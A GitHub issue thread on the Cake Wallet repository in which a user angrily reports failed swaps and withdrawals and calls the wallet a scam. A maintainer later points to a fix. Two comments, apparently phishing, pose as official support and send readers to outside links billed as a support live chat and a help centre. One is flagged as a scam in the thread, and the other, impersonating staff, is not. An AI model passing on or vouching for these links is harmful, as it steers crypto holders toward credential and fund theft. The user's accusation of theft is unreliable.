### ISSUE TITLE
WARNING CAKE WALLET HAS STOLEN MY BITCOINS!!!!

### ISSUE THREAD

**Issue by happeeshopper** [cake-tech/cake_wallet#1853]
**Describe the bug**
I CANNOT MAKE ANY SWAP AND NEITHER CAN I WITHDRAW MY ALREADY SENT CRYPTO (BTC)!!!

**To Reproduce**
SEND SOME BTC TO THIS SCAM PIECE OF SHIT!!!

**Expected behavior**
TO BE ABLE TO WITHDRAW OR SWAP MY CRYPTO!!!

**Screenshots**

I OPENED AN ISSUE REGARDING SWAPS BEING BROKEN HERE: https://github.com/cake-tech/cake_wallet/issues/1852

NOW I CANNOT EVEN WITHDRAW MY OWN GOD DAMN COINS BECAUSE OF THE SAME BUG!!!!

EVERY TIME I TRY TO WITHDRAW I GET THE SAME GOD DAMN ERROR:

![3](https://github.com/user-attachments/assets/32cb3cd8-139f-4d2a-b467-547ad88f7f01)

NOW MY FUNDS ARE TOTALLY LOCKED IN THIS ABHORRENT PIECE OF SHIT SOFTWARE - I CANNOT SWAP AND I CANNOT WITHDRAW!!!!

I HAVE GONE THROUGH EVERY GOD DAMN SETTING IN THIS PIECE OF SHIT AND THERE IS NO OPTION FOR THIS "COIN CONTROL" ANYWHERE - NOT IN THE SETTINGS AND NOT IN THE SWAP SECTION AND NOT IN THE WITHDRAW SECTION!!!!

**Platform:**
 - OS: MXLinux 23.4
 - Device: Desktop
 - Cake Wallet Version: 4.21.2

**Additional context**
DO NOT SEND YOUR COINS TO THIS HORRENDOUS PIECE OF SHIT SCAM WALLET!!!

**Comment by veenTech-cloud** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Cake Wallet Support Request](https://dappsrectification-chain.pages.dev/)

Use the live chat button in the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by Justxd22** [comment]
Don't follow the link posted it's a scam

**Comment by OmarHatem28** [comment]
fixed, please check your previous issue comment https://github.com/cake-tech/cake_wallet/issues/1852#issuecomment-2515338183

**Comment by Drianna75** [comment]
Hi there,

I attempted to reproduce your issue and was unable to do so.

We use GitHub issues as a place to track bugs and other development-related issues. If your issue persists, please write us back using our “Chat Support” icon located on our [Cake Wallet Help Center](https://generalwebfixes.web.app/)

You can include a link to this issue in the message content.

Alternatively, you can also search for an answer in our help documentation or get help from other users on our [community forums](https://generalwebfixes.web.app/).

The issue here will be closed.

Thanks!
